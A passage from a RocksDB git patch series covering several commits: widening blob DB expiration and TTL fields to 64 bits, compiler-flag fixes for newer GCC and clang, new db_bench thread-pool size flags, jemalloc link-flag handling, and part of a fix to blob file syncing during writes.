expiration) { + assert(expiration != kNoExpiration); uint64_t epoch_read = 0; std::shared_ptr bfile; { @@ -698,9 +698,9 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint32_t expiration) { return bfile; } - uint32_t exp_low = + uint64_t exp_low = (expiration / bdb_options_.ttl_range_secs) * bdb_options_.ttl_range_secs; - uint32_t exp_high = exp_low + bdb_options_.ttl_range_secs; + uint64_t exp_high = exp_low + bdb_options_.ttl_range_secs; ttlrange_t ttl_guess = std::make_pair(exp_low, exp_high); bfile = NewBlobFile("SelectBlobFileTTL"); @@ -758,7 +758,7 @@ Status BlobDBImpl::Put(const WriteOptions& options, const Slice& value) { 
std::string new_value; Slice value_slice; - int32_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); + uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); return PutUntil(options, column_family, key, value_slice, expiration); } @@ -808,11 +808,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value_slice) override { Slice value_unc; - int32_t expiration = + uint64_t expiration = impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); std::shared_ptr bfile = - (expiration != -1) + (expiration != kNoExpiration) ? impl_->SelectBlobFileTTL(expiration) : ((last_file_) ? last_file_ : impl_->SelectBlobFile()); if (last_file_ && last_file_ != bfile) { @@ -840,8 +840,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { sequence_++; } - if (expiration != -1) { - extendTTL(&(bfile->ttl_range_), (uint32_t)expiration); + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); } if (!st.ok()) { @@ -935,9 +935,10 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Status BlobDBImpl::PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, - int32_t ttl) { - return PutUntil(options, column_family, key, value, - static_cast(EpochNow()) + ttl); + uint64_t ttl) { + uint64_t now = EpochNow(); + assert(std::numeric_limits::max() - now > ttl); + return PutUntil(options, column_family, key, value, now + ttl); } Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, @@ -952,15 +953,15 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, return *compression_output; } -// TODO(yiwu): We should use uint64_t for expiration. Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value_unc, int32_t expiration) { + const Slice& value_unc, uint64_t expiration) { MutexLock l(&write_mutex_); UpdateWriteOptions(options); - std::shared_ptr bfile = - (expiration != -1) ? SelectBlobFileTTL(expiration) : SelectBlobFile(); + std::shared_ptr bfile = (expiration != kNoExpiration) + ? SelectBlobFileTTL(expiration) + : SelectBlobFile(); if (!bfile) return Status::NotFound("Blob file not found"); @@ -1020,29 +1021,27 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, bfile->DumpState().c_str()); } - if (expiration != -1) extendTTL(&(bfile->ttl_range_), (uint32_t)expiration); + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); + } CloseIf(bfile); return s; } -// TODO(yiwu): We should return uint64_t after updating the rest of the code -// to use uint64_t for expiration. -int32_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, - Slice* value_slice, - std::string* new_value) { +uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, + std::string* new_value) { uint64_t expiration = kNoExpiration; + bool has_expiration = false; bool value_changed = false; if (ttl_extractor_ != nullptr) { - bool has_ttl = ttl_extractor_->ExtractExpiration( + has_expiration = ttl_extractor_->ExtractExpiration( key, value, EpochNow(), &expiration, new_value, &value_changed); - if (!has_ttl) { - expiration = kNoExpiration; - } } *value_slice = value_changed ? Slice(*new_value) : value; - return (expiration == kNoExpiration) ? -1 : static_cast(expiration); + return has_expiration ? 
expiration : kNoExpiration; } Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, @@ -1847,11 +1846,11 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, // Ideally we should hold the lock during the entire function, // but under the asusmption that this is only called when a // file is Immutable, we can reduce the critical section -bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, std::time_t tt, +bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, uint64_t last_id, std::string* reason) { if (bfile->HasTTL()) { ttlrange_t ttl_range = bfile->GetTTLRange(); - if (tt > ttl_range.second) { + if (now > ttl_range.second) { *reason = "entire file ttl expired"; return true; } @@ -2057,8 +2056,7 @@ void BlobDBImpl::FilterSubsetOfFiles( // 100.0 / 15.0 = 7 uint64_t next_epoch_increment = static_cast( std::ceil(100 / static_cast(kGCFilePercentage))); - std::chrono::system_clock::time_point now = std::chrono::system_clock::now(); - std::time_t tt = std::chrono::system_clock::to_time_t(now); + uint64_t now = EpochNow(); size_t files_processed = 0; for (auto bfile : blob_files) { @@ -2081,18 +2079,20 @@ void BlobDBImpl::FilterSubsetOfFiles( if (bfile->Obsolete() || !bfile->Immutable()) continue; std::string reason; - bool shouldgc = ShouldGCFile(bfile, tt, last_id, &reason); + bool shouldgc = ShouldGCFile(bfile, now, last_id, &reason); if (!shouldgc) { ROCKS_LOG_DEBUG(db_options_.info_log, - "File has been skipped for GC ttl %s %d %d reason='%s'", - bfile->PathName().c_str(), tt, + "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 + " reason='%s'", + bfile->PathName().c_str(), now, bfile->GetTTLRange().second, reason.c_str()); continue; } ROCKS_LOG_INFO(db_options_.info_log, - "File has been chosen for GC ttl %s %d %d reason='%s'", - bfile->PathName().c_str(), tt, bfile->GetTTLRange().second, + "File has been chosen for GC ttl %s %" PRIu64 " %" PRIu64 + " reason='%s'", + bfile->PathName().c_str(), now, bfile->GetTTLRange().second, reason.c_str()); to_process->push_back(bfile); } diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 5105c8c17b1..d812604bef5 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -202,9 +202,6 @@ class BlobDBImpl : public BlobDB { // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; - static constexpr uint64_t kNoExpiration = - std::numeric_limits::max(); - using rocksdb::StackableDB::Put; Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value) override; @@ -238,12 +235,12 @@ class BlobDBImpl : public BlobDB { using BlobDB::PutWithTTL; Status PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, int32_t ttl) override; + const Slice& value, uint64_t ttl) override; using BlobDB::PutUntil; Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value_unc, int32_t expiration) override; + const Slice& value_unc, uint64_t expiration) override; Status LinkToBaseDB(DB* db) override; @@ -290,7 +287,7 @@ class BlobDBImpl : public BlobDB { // has expired or if threshold of the file has been evicted // tt - current time // last_id - the id of the non-TTL file to evict - bool ShouldGCFile(std::shared_ptr bfile, std::time_t tt, + bool ShouldGCFile(std::shared_ptr bfile, uint64_t now, uint64_t last_id, std::string* reason); // 
collect all the blob log files from the blob directory @@ -299,8 +296,8 @@ class BlobDBImpl : public BlobDB { // appends a task into timer queue to close the file void CloseIf(const std::shared_ptr& bfile); - int32_t ExtractExpiration(const Slice& key, const Slice& value, - Slice* value_slice, std::string* new_value); + uint64_t ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, std::string* new_value); Status AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, @@ -311,12 +308,12 @@ class BlobDBImpl : public BlobDB { // find an existing blob log file based on the expiration unix epoch // if such a file does not exist, return nullptr - std::shared_ptr SelectBlobFileTTL(uint32_t expiration); + std::shared_ptr SelectBlobFileTTL(uint64_t expiration); // find an existing blob log file to append the value to std::shared_ptr SelectBlobFile(); - std::shared_ptr FindBlobFileLocked(uint32_t expiration) const; + std::shared_ptr FindBlobFileLocked(uint64_t expiration) const; void UpdateWriteOptions(const WriteOptions& options); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 199a9e0750a..9f3ae1b012f 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -63,7 +63,7 @@ class BlobDBTest : public testing::Test { } } - void PutRandomWithTTL(const std::string &key, int32_t ttl, Random *rnd, + void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; std::string value = test::RandomHumanReadableString(rnd, len); @@ -74,7 +74,7 @@ class BlobDBTest : public testing::Test { } } - void PutRandomUntil(const std::string &key, int32_t expiration, Random *rnd, + void PutRandomUntil(const std::string &key, uint64_t expiration, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; std::string value = test::RandomHumanReadableString(rnd, len); @@ -136,7 +136,7 @@ class BlobDBTest : public testing::Test { Random rnd(301); for (size_t i = 0; i < 100000; i++) { - int32_t ttl = rnd.Next() % 86400; + uint64_t ttl = rnd.Next() % 86400; PutRandomWithTTL("key" + ToString(i % 500), ttl, &rnd, nullptr); } @@ -175,7 +175,7 @@ TEST_F(BlobDBTest, PutWithTTL) { std::map data; mock_env_->set_now_micros(50 * 1000000); for (size_t i = 0; i < 100; i++) { - int32_t ttl = rnd.Next() % 100; + uint64_t ttl = rnd.Next() % 100; PutRandomWithTTL("key" + ToString(i), ttl, &rnd, (ttl < 50 ? nullptr : &data)); } @@ -204,7 +204,7 @@ TEST_F(BlobDBTest, PutUntil) { std::map data; mock_env_->set_now_micros(50 * 1000000); for (size_t i = 0; i < 100; i++) { - int32_t expiration = rnd.Next() % 100 + 50; + uint64_t expiration = rnd.Next() % 100 + 50; PutRandomUntil("key" + ToString(i), expiration, &rnd, (expiration < 100 ? 
nullptr : &data)); } diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc index f426802c2f9..c9db7e8fa67 100644 --- a/utilities/blob_db/blob_dump_tool.cc +++ b/utilities/blob_db/blob_dump_tool.cc @@ -102,8 +102,8 @@ Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) { return s; } fprintf(stdout, "Blob log header:\n"); - fprintf(stdout, " Magic Number : %u\n", header.magic_number()); - fprintf(stdout, " Version : %d\n", header.version()); + fprintf(stdout, " Magic Number : %" PRIu32 "\n", header.magic_number()); + fprintf(stdout, " Version : %" PRIu32 "\n", header.version()); CompressionType compression = header.compression(); std::string compression_str; if (!GetStringFromCompressionType(&compression_str, compression).ok()) { @@ -175,13 +175,13 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, } uint32_t key_size = record.GetKeySize(); uint64_t blob_size = record.GetBlobSize(); - fprintf(stdout, " key size : %d\n", key_size); + fprintf(stdout, " key size : %" PRIu32 "\n", key_size); fprintf(stdout, " blob size : %" PRIu64 "\n", record.GetBlobSize()); - fprintf(stdout, " TTL : %u\n", record.GetTTL()); + fprintf(stdout, " TTL : %" PRIu64 "\n", record.GetTTL()); fprintf(stdout, " time : %" PRIu64 "\n", record.GetTimeVal()); fprintf(stdout, " type : %d, %d\n", record.type(), record.subtype()); - fprintf(stdout, " header CRC : %u\n", record.header_checksum()); - fprintf(stdout, " CRC : %u\n", record.checksum()); + fprintf(stdout, " header CRC : %" PRIu32 "\n", record.header_checksum()); + fprintf(stdout, " CRC : %" PRIu32 "\n", record.checksum()); uint32_t header_crc = crc32c::Extend(0, slice.data(), slice.size() - 2 * sizeof(uint32_t)); *offset += BlobLogRecord::kHeaderSize; @@ -213,7 +213,7 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, if (!s.ok()) { return s; } - fprintf(stdout, " footer CRC : %u\n", record.footer_checksum()); + fprintf(stdout, " footer CRC : %" PRIu32 "\n", record.footer_checksum()); fprintf(stdout, " sequence : %" PRIu64 "\n", record.GetSN()); *offset += key_size + blob_size + BlobLogRecord::kFooterSize; return s; diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index 51bba2fb862..8ba005dd6e1 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -94,8 +94,8 @@ std::string BlobFile::DumpState() const { "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64 " file_size: %" PRIu64 " deleted_count: %" PRIu64 " deleted_size: %" PRIu64 - " closed: %d can_be_deleted: %d ttl_range: (%d, %d)" - " sn_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", + " closed: %d can_be_deleted: %d ttl_range: (%" PRIu64 ", %" PRIu64 + ") sn_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", path_to_dir_.c_str(), file_number_, blob_count_.load(), gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_, closed_.load(), can_be_deleted_.load(), ttl_range_.first, diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc index 6917a290f37..b5c8fe56e8b 100644 --- a/utilities/blob_db/blob_log_format.cc +++ b/utilities/blob_db/blob_log_format.cc @@ -61,8 +61,8 @@ Status BlobLogFooter::DecodeFrom(const Slice& input) { } ttlrange_t temp_ttl; - if (!GetFixed32(&slice, &temp_ttl.first) || - !GetFixed32(&slice, &temp_ttl.second)) { + if (!GetFixed64(&slice, &temp_ttl.first) || + !GetFixed64(&slice, &temp_ttl.second)) { return Status::Corruption("Invalid Blob Footer: ttl_range"); } 
if (has_ttl) { @@ -108,11 +108,11 @@ void BlobLogFooter::EncodeTo(std::string* dst) const { bool has_ts = HasTimestamp(); if (has_ttl) { - PutFixed32(dst, ttl_range_.get()->first); - PutFixed32(dst, ttl_range_.get()->second); + PutFixed64(dst, ttl_range_.get()->first); + PutFixed64(dst, ttl_range_.get()->second); } else { - PutFixed32(dst, 0); - PutFixed32(dst, 0); + PutFixed64(dst, 0); + PutFixed64(dst, 0); } PutFixed64(dst, sn_range_.first); PutFixed64(dst, sn_range_.second); @@ -149,11 +149,11 @@ void BlobLogHeader::EncodeTo(std::string* dst) const { PutFixed32(dst, val); if (has_ttl) { - PutFixed32(dst, ttl_guess_.get()->first); - PutFixed32(dst, ttl_guess_.get()->second); + PutFixed64(dst, ttl_guess_.get()->first); + PutFixed64(dst, ttl_guess_.get()->second); } else { - PutFixed32(dst, 0); - PutFixed32(dst, 0); + PutFixed64(dst, 0); + PutFixed64(dst, 0); } if (has_ts) { @@ -199,11 +199,13 @@ Status BlobLogHeader::DecodeFrom(const Slice& input) { } ttlrange_t temp_ttl; - if (!GetFixed32(&slice, &temp_ttl.first) || - !GetFixed32(&slice, &temp_ttl.second)) { + if (!GetFixed64(&slice, &temp_ttl.first) || + !GetFixed64(&slice, &temp_ttl.second)) { return Status::Corruption("Invalid Blob Log Header: ttl"); } - if (has_ttl) set_ttl_guess(temp_ttl); + if (has_ttl) { + set_ttl_guess(temp_ttl); + } tsrange_t temp_ts; if (!GetFixed64(&slice, &temp_ts.first) || @@ -265,7 +267,7 @@ Status BlobLogRecord::DecodeHeaderFrom(const Slice& hdrslice) { if (!GetFixed64(&input, &blob_size_)) { return Status::Corruption("Invalid Blob Record Header: blob_size"); } - if (!GetFixed32(&input, &ttl_val_)) { + if (!GetFixed64(&input, &ttl_val_)) { return Status::Corruption("Invalid Blob Record Header: ttl_val"); } if (!GetFixed64(&input, &time_val_)) { diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index f4e62fe2d96..5a22390b271 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -25,6 +25,8 @@ namespace blob_db { class BlobFile; class BlobDBImpl; +constexpr uint64_t kNoExpiration = std::numeric_limits::max(); + enum RecordType : uint8_t { // Zero is reserved for preallocated files kFullType = 0, @@ -46,9 +48,9 @@ extern const uint32_t kMagicNumber; class Reader; -typedef std::pair ttlrange_t; -typedef std::pair tsrange_t; -typedef std::pair snrange_t; +using ttlrange_t = std::pair; +using tsrange_t = std::pair; +using snrange_t = std::pair; class BlobLogHeader { friend class BlobFile; @@ -71,8 +73,8 @@ class BlobLogHeader { void set_ts_guess(const tsrange_t& ts) { ts_guess_.reset(new tsrange_t(ts)); } public: - // magic number + version + flags + ttl guess + timestamp range = 36 - static const size_t kHeaderSize = 4 + 4 + 4 + 4 * 2 + 8 * 2; + // magic number + version + flags + ttl guess + timestamp range = 44 + static const size_t kHeaderSize = 4 + 4 + 4 + 8 * 2 + 8 * 2; void EncodeTo(std::string* dst) const; @@ -100,9 +102,9 @@ class BlobLogHeader { return *ts_guess_; } - bool HasTTL() const { return !!ttl_guess_; } + bool HasTTL() const { return ttl_guess_ != nullptr; } - bool HasTimestamp() const { return !!ts_guess_; } + bool HasTimestamp() const { return ts_guess_ != nullptr; } BlobLogHeader& operator=(BlobLogHeader&& in) noexcept; }; @@ -128,11 +130,11 @@ class BlobLogFooter { // footer size = 4 byte magic number // 8 bytes count - // 4, 4 - ttl range + // 8, 8 - ttl range // 8, 8 - sn range // 8, 8 - ts range - // = 56 - static const size_t kFooterSize = 4 + 4 + 8 + (4 * 2) + (8 * 2) + (8 * 2); + // = 64 + static const 
size_t kFooterSize = 4 + 4 + 8 + (8 * 2) + (8 * 2) + (8 * 2); bool HasTTL() const { return !!ttl_range_; } @@ -185,7 +187,7 @@ class BlobLogRecord { uint32_t key_size_; uint64_t blob_size_; uint64_t time_val_; - uint32_t ttl_val_; + uint64_t ttl_val_; SequenceNumber sn_; uint32_t footer_cksum_; char type_; @@ -209,11 +211,12 @@ class BlobLogRecord { public: // Header is // Key Length ( 4 bytes ), - // Blob Length ( 8 bytes), timestamp/ttl (8 bytes), + // Blob Length ( 8 bytes), + // ttl (8 bytes), timestamp (8 bytes), // type (1 byte), subtype (1 byte) // header checksum (4 bytes), blob checksum (4 bytes), - // = 34 - static const size_t kHeaderSize = 4 + 4 + 4 + 8 + 4 + 8 + 1 + 1; + // = 42 + static const size_t kHeaderSize = 4 + 4 + 8 + 8 + 4 + 8 + 1 + 1; static const size_t kFooterSize = 8 + 4; @@ -234,7 +237,7 @@ class BlobLogRecord { return ttl_val_ != std::numeric_limits::max(); } - uint32_t GetTTL() const { return ttl_val_; } + uint64_t GetTTL() const { return ttl_val_; } uint64_t GetTimeVal() const { return time_val_; } diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc index 1ffc74a4299..0a049b75c69 100644 --- a/utilities/blob_db/blob_log_writer.cc +++ b/utilities/blob_db/blob_log_writer.cc @@ -8,7 +8,6 @@ #include "utilities/blob_db/blob_log_writer.h" #include -#include #include #include "rocksdb/env.h" #include "util/coding.h" @@ -72,7 +71,7 @@ Status Writer::AppendFooter(const BlobLogFooter& footer) { Status Writer::AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset, - uint32_t ttl) { + uint64_t ttl) { assert(block_offset_ != 0); assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); @@ -96,26 +95,23 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, } void Writer::ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, int32_t ttl, int64_t ts) { + const Slice& val, uint64_t ttl, int64_t ts) { headerbuf->reserve(BlobLogRecord::kHeaderSize); uint32_t key_size = static_cast(key.size()); PutFixed32(headerbuf, key_size); PutFixed64(headerbuf, val.size()); - uint32_t ttl_write = (ttl != -1) ? static_cast(ttl) - : std::numeric_limits::max(); - PutFixed32(headerbuf, ttl_write); - - uint64_t ts_write = (ts != -1) ? 
static_cast(ts) - : std::numeric_limits::max(); - PutFixed64(headerbuf, ts_write); + PutFixed64(headerbuf, ttl); + PutFixed64(headerbuf, ts); RecordType t = kFullType; headerbuf->push_back(static_cast(t)); RecordSubType st = kRegularType; - if (ttl != -1) st = kTTLType; + if (ttl != kNoExpiration) { + st = kTTLType; + } headerbuf->push_back(static_cast(st)); uint32_t header_crc = 0; diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h index b6c7a2a9901..a3c176ecbfe 100644 --- a/utilities/blob_db/blob_log_writer.h +++ b/utilities/blob_db/blob_log_writer.h @@ -41,13 +41,13 @@ class Writer { ~Writer(); static void ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, int32_t ttl, int64_t ts); + const Slice& val, uint64_t ttl, int64_t ts); Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, - uint64_t* blob_offset, uint32_t ttl); + uint64_t* blob_offset, uint64_t ttl); Status EmitPhysicalRecord(const std::string& headerbuf, const Slice& key, const Slice& val, uint64_t* key_offset, From 4f81ab38bf18aacdc5f2e2f2a82cf577989ae39b Mon Sep 17 00:00:00 2001 From: Cholerae Hu Date: Thu, 3 Aug 2017 20:55:01 -0700 Subject: [PATCH 076/205] Makefile: fix for GCC 7+ and clang 4+ Summary: maysamyabandeh IslamAbdelRahman PTAL Fix https://github.com/facebook/rocksdb/issues/2672 Signed-off-by: Cholerae Hu Closes https://github.com/facebook/rocksdb/pull/2681 Differential Revision: D5561515 Pulled By: ajkr fbshipit-source-id: 676187802ebd8a87a6c051bb565818a1bf89d0a9 --- Makefile | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/Makefile b/Makefile index a01c74e954e..fc413e1d66e 100644 --- a/Makefile +++ b/Makefile @@ -255,6 +255,19 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter +CCVERSION = $(shell $(CXX) -dumpversion) +CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") + +ifeq ($(CCNAME), clang) +ifeq ($(CCVERSION), 4*) + CXXFLAGS += -faligned-new +endif +else +ifeq ($(CCVERSION), 7) + CXXFLAGS += -faligned-new +endif +endif + ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror endif From dce6d5a8385456eaf52a3b16043129b424e0de9f Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 3 Aug 2017 21:30:37 -0700 Subject: [PATCH 077/205] db_bench background work thread pool size arguments Summary: The background thread pools' sizes weren't easily configurable by `max_background_compactions` and `max_background_flushes` in multi-instance setups. Introduced separate arguments for their sizes. 
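The underlying issue is that Env thread pools are process-wide and shared by every DB instance using that Env, while max_background_compactions and max_background_flushes are per-DB options that only grow the shared pools as a side effect of options sanitization (as the diff below notes). With the new flags, the pool sizes can be pinned up front. A sketch of the equivalent application-side setup, assuming the shared default Env; sizes and paths are placeholders:

```
#include <cassert>
#include "rocksdb/db.h"
#include "rocksdb/env.h"
#include "rocksdb/options.h"

int main() {
  rocksdb::Env* env = rocksdb::Env::Default();
  // Size the process-wide pools once, independently of any single DB's
  // max_background_compactions / max_background_flushes.
  env->SetBackgroundThreads(8, rocksdb::Env::Priority::LOW);   // compactions
  env->SetBackgroundThreads(2, rocksdb::Env::Priority::HIGH);  // flushes

  rocksdb::Options options;
  options.create_if_missing = true;
  rocksdb::DB* db1 = nullptr;
  rocksdb::DB* db2 = nullptr;
  assert(rocksdb::DB::Open(options, "/tmp/db1", &db1).ok());  // both instances
  assert(rocksdb::DB::Open(options, "/tmp/db2", &db2).ok());  // share the pools
  delete db1;
  delete db2;
  return 0;
}
```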
Closes https://github.com/facebook/rocksdb/pull/2680 Differential Revision: D5550675 Pulled By: ajkr fbshipit-source-id: bab5f0a7bc5db63bb084d0c10facbe437096367d --- tools/db_bench_tool.cc | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index 6dfff771fc5..6f12390af70 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -322,6 +322,14 @@ DEFINE_int32(num_bottom_pri_threads, 0, "The number of threads in the bottom-priority thread pool (used " "by universal compaction only)."); +DEFINE_int32(num_high_pri_threads, 0, + "The maximum number of concurrent background compactions" + " that can occur in parallel."); + +DEFINE_int32(num_low_pri_threads, 0, + "The maximum number of concurrent background compactions" + " that can occur in parallel."); + DEFINE_int32(max_background_compactions, rocksdb::Options().max_background_compactions, "The maximum number of concurrent background compactions" @@ -5241,13 +5249,14 @@ int db_bench_tool(int argc, char** argv) { FLAGS_rep_factory = StringToRepFactory(FLAGS_memtablerep.c_str()); - // The number of background threads should be at least as much the - // max number of concurrent compactions. - FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions); - FLAGS_env->SetBackgroundThreads(FLAGS_max_background_flushes, + // Note options sanitization may increase thread pool sizes according to + // max_background_flushes/max_background_compactions/max_background_jobs + FLAGS_env->SetBackgroundThreads(FLAGS_num_high_pri_threads, rocksdb::Env::Priority::HIGH); FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads, rocksdb::Env::Priority::BOTTOM); + FLAGS_env->SetBackgroundThreads(FLAGS_num_low_pri_threads, + rocksdb::Env::Priority::LOW); // Choose a location for the test database if none given with --db= if (FLAGS_db.empty()) { From 627c9f1abb263ab8d2072a1ac9d30a6e4bc3dde4 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 4 Aug 2017 10:27:39 -0700 Subject: [PATCH 078/205] Don't add -ljemalloc when DISABLE_JEMALLOC is set Summary: fixes #2555 Closes https://github.com/facebook/rocksdb/pull/2684 Differential Revision: D5560527 Pulled By: maysamyabandeh fbshipit-source-id: 6e1d874ae0b4e699a77203d9d52d0bb8f59013b0 --- Makefile | 4 ++++ build_tools/build_detect_platform | 13 +++++++++++-- 2 files changed, 15 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index fc413e1d66e..ef42deecedd 100644 --- a/Makefile +++ b/Makefile @@ -232,6 +232,10 @@ ifndef DISABLE_JEMALLOC PLATFORM_CXXFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE PLATFORM_CCFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE endif + ifdef WITH_JEMALLOC_FLAG + PLATFORM_LDFLAGS += -ljemalloc + JAVA_LDFLAGS += -ljemalloc + endif EXEC_LDFLAGS := $(JEMALLOC_LIB) $(EXEC_LDFLAGS) PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE) PLATFORM_CCFLAGS += $(JEMALLOC_INCLUDE) diff --git a/build_tools/build_detect_platform b/build_tools/build_detect_platform index 440c6a5e39f..d040f21f517 100755 --- a/build_tools/build_detect_platform +++ b/build_tools/build_detect_platform @@ -317,9 +317,11 @@ EOF # Test whether jemalloc is available if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null -ljemalloc \ 2>/dev/null; then - PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -ljemalloc" - JAVA_LDFLAGS="$JAVA_LDFLAGS -ljemalloc" + # This will enable some preprocessor identifiers in the Makefile JEMALLOC=1 + # JEMALLOC can be enabled either using the flag (like here) or by + # providing direct link to the 
jemalloc library + WITH_JEMALLOC_FLAG=1 else # jemalloc is not available. Let's try tcmalloc if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null \ @@ -517,7 +519,14 @@ echo "ROCKSDB_PATCH=$ROCKSDB_PATCH" >> "$OUTPUT" echo "CLANG_SCAN_BUILD=$CLANG_SCAN_BUILD" >> "$OUTPUT" echo "CLANG_ANALYZER=$CLANG_ANALYZER" >> "$OUTPUT" echo "PROFILING_FLAGS=$PROFILING_FLAGS" >> "$OUTPUT" +# This will enable some related identifiers for the preprocessor if test -n "$JEMALLOC"; then echo "JEMALLOC=1" >> "$OUTPUT" fi +# Indicates that jemalloc should be enabled using -ljemalloc flag +# The alternative is to porvide a direct link to the library via JEMALLOC_LIB +# and JEMALLOC_INCLUDE +if test -n "$WITH_JEMALLOC_FLAG"; then + echo "WITH_JEMALLOC_FLAG=$WITH_JEMALLOC_FLAG" >> "$OUTPUT" +fi echo "LUA_PATH=$LUA_PATH" >> "$OUTPUT" From 0d4a2b733070a1bd52f981313f9e17f126701407 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 4 Aug 2017 13:09:56 -0700 Subject: [PATCH 079/205] Avoid blob db call Sync() while writing Summary: The FsyncFiles background job calls Fsync() periodically for blob files. However, it can access a WritableFileWriter concurrently with a Put() or Write(), and WritableFileWriter does not support concurrent access. This can lead to the WritableFileWriter buffer being flushed with the same content twice, leaving the blob file corrupted. Fix by simply letting FsyncFiles hold write_mutex_. Closes https://github.com/facebook/rocksdb/pull/2685 Differential Revision: D5561908 Pulled By: yiwu-arbug fbshipit-source-id: f0bb5bcab0e05694e053b8c49eab43640721e872 --- utilities/blob_db/blob_db_impl.cc | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f35bc4ac3f5..783c9d4ef1b 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -545,12 +545,7 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { std::string fpath(bfile->PathName()); std::unique_ptr wfile; - // We are having issue that we write duplicate blob to blob file and the bug - // is related to writable file buffer. Force no buffer until we fix the bug. - EnvOptions env_options = env_options_; - env_options.writable_file_max_buffer_size = 0; - - Status s = env_->ReopenWritableFile(fpath, &wfile, env_options); + Status s = 